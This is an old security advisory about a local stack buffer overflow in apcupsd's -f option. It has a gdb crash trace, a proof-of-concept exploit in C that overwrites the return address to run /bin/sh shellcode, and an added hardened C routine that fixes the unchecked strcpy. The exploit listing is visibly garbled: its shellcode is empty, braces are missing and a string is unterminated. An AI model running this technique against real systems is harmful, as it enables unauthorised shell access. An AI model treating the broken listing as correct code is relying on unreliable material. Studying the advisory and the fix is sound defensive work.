
apcupsd local buffer overflow
21st Mar 2003 [SBWID-6082]

	apcupsd local buffer overflow


	tested with apcupsd delivered with Suse 8.0


	Thanks to Serkan Akpolat [] for the advisory:
	Apcupsd is a daemon for most APC UPSes for Linux. There is no bounds
	checking in the source code, so overflowing the buffer is possible.
	Apcupsd is by default not setuid root (SuSE 8.0). A proof of concept
	shell spawning exploit is attached to mail.
	milkshake:~ # apcupsd -f
	Segmentation fault (core dumped)
	milkshake:~ # gdb -q /sbin/apcupsd ./core
	(no debugging symbols found)...
	Core was generated by `apcupsd -f
	Program terminated with signal 11, Segmentation fault.
	Reading symbols from /lib/ debugging symbols
	[New Thread 1024 (LWP 1920)]
	Reading symbols from /lib/ debugging symbols found)...done.
	Loaded symbols for /lib/
	Reading symbols from /lib/ debugging symbols
	Loaded symbols for /lib/
	#0  0x40091a99 in vfprintf () from /lib/
	(gdb) bt
	#0  0x40091a99 in vfprintf () from /lib/
	#1  0x400a8a86 in vsprintf () from /lib/
	#2  0x08049b0c in strcpy ()
	#3  0x41414141 in ?? ()
	(gdb) q
	Exploit spawns a shell with the uid of the user who runs the exploit.
	Tested on SuSE 8.0
	milkshake:~ # cat eXapcupsd.c
	/* Proof of Concept Code for buffer overflow vulnerability in apcupsd--------*/
	/* This code has been tested in SuSE 8.0 -----------------------------------*/
	/* Apcupsd isn't by default setuid root in SuSE 8.0------------------------*/
	/* This code spawns a shell with the uid of the user, who runs the exploit*/
	/* Greetings to Avicenna , Hackpimp , Murat Balaban , team---*/
	/* Written by Serkan Akpolat --------------------------*/
	#include <stdio.h>
	#include <string.h>
	#include <unistd.h>
	#define BUFSIZE 500
	#define PADDING 3
	char sc[] =
	/* Murat Balaban execve /bin/sh shellcode                    */
	int main(void)
	char *env[3] = {sc, NULL};
	char buf[BUFSIZE];
	int i,j,ret;
	int *ap;
	for(j=0;j < PADDING;j++){
	ap = (int *)(buf + PADDING);
	ret = 0xbffffffa - strlen(sc) -strlen("/sbin/apcupsd");
	printf("Shellcode is on 0x%08x , %d junk bytes used for
	printf("\t\t<--PRESS ENTER-->");
	for (i = 0; i < BUFSIZE - 8; i += 4)
	*ap++ = ret;
	*ap++ ='\0';
	execle("/sbin/apcupsd", "apcupsd", "-f", buf, NULL, env);
	milkshake:~ # gcc eXapcupsd.c
	milkshake:~ # ./a.out
	Shellcode is on 0xbfffffc0 , 3 junk bytes used for alignment.
	apcupsd FATAL ERROR in apcconfig.c at line 833
	Error opening configuration file
	(AAA): ~^
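The defect the advisory describes is an unchecked copy of the -f argument into a fixed-size buffer: the backtrace shows strcpy() on the stack and a frame at 0x41414141 ("AAAA"), i.e. the saved return address overwritten by the argument. The following C program is an added example and is not part of the advisory or of apcupsd's source. It shows the unchecked pattern in a comment and implements the length-checked copy that prevents this class of overflow. The buffer size CFG_PATH_MAX, the function names and the status values are assumptions chosen for the example; apcupsd's real buffer size and names are not given on the page.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed size of the configuration-file path buffer. The real apcupsd
 * buffer size is not stated in the advisory; this value is constructed
 * for the example. */
#define CFG_PATH_MAX 256

/* Result of trying to install a user-supplied path into the fixed buffer. */
typedef enum { PATH_OK = 0, PATH_TOO_LONG = 1, PATH_EMPTY = 2 } path_status;

/*
 * The advisory's defect is the pattern
 *
 *     char cfgfile[CFG_PATH_MAX];
 *     strcpy(cfgfile, arg);      <- no check of strlen(arg) against the buffer
 *
 * where arg comes from the -f command-line option. strcpy() writes until it
 * finds the NUL in arg, so an argument longer than the buffer overwrites
 * whatever follows it on the stack, which is why the backtrace on this page
 * ends in a frame at 0x41414141.
 *
 * The hardened form measures the input first and refuses it if the buffer
 * cannot hold it together with the terminating NUL.
 */
path_status set_config_path(char *dst, size_t dstlen, const char *src)
{
    const char *nul;
    size_t n;

    if (dstlen == 0)
        return PATH_TOO_LONG;
    if (src == NULL || *src == '\0')
        return PATH_EMPTY;

    /* Look for the NUL only within the first dstlen bytes of src, so a very
     * long input is never scanned past the limit we are prepared to copy. */
    nul = memchr(src, '\0', dstlen);
    if (nul == NULL)
        return PATH_TOO_LONG;          /* strlen(src) >= dstlen: no room for NUL */

    n = (size_t)(nul - src);
    memcpy(dst, src, n + 1);           /* n bytes of path plus the NUL */
    return PATH_OK;
}

/* Classify a command-line value without exposing the buffer to the caller. */
path_status classify_config_path(const char *arg)
{
    char cfgfile[CFG_PATH_MAX];
    return set_config_path(cfgfile, sizeof cfgfile, arg);
}

/* Classify an argument made of `len` non-NUL bytes (constructed input,
 * mirroring the 500-byte argument the proof of concept passes). */
path_status classify_path_of_length(size_t len)
{
    char *arg = malloc(len + 1);
    path_status st;

    if (arg == NULL)
        return PATH_TOO_LONG;
    memset(arg, 'A', len);
    arg[len] = '\0';
    st = classify_config_path(arg);
    free(arg);
    return st;
}

int main(int argc, char **argv)
{
    char cfgfile[CFG_PATH_MAX];
    const char *arg = argc > 1 ? argv[1] : "/etc/apcupsd/apcupsd.conf";

    switch (set_config_path(cfgfile, sizeof cfgfile, arg)) {
    case PATH_OK:
        printf("config file: %s\n", cfgfile);
        return 0;
    case PATH_TOO_LONG:
        fprintf(stderr, "config path too long (limit %d bytes)\n", CFG_PATH_MAX - 1);
        return 1;
    case PATH_EMPTY:
        fprintf(stderr, "config path must not be empty\n");
        return 1;
    }
    return 1;
}
```

Compiled stand-alone, the program takes the path as its first argument and reports whether it was accepted; an argument of 500 bytes like the one the proof of concept builds is rejected with an error before any byte is copied, instead of running off the end of the buffer.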


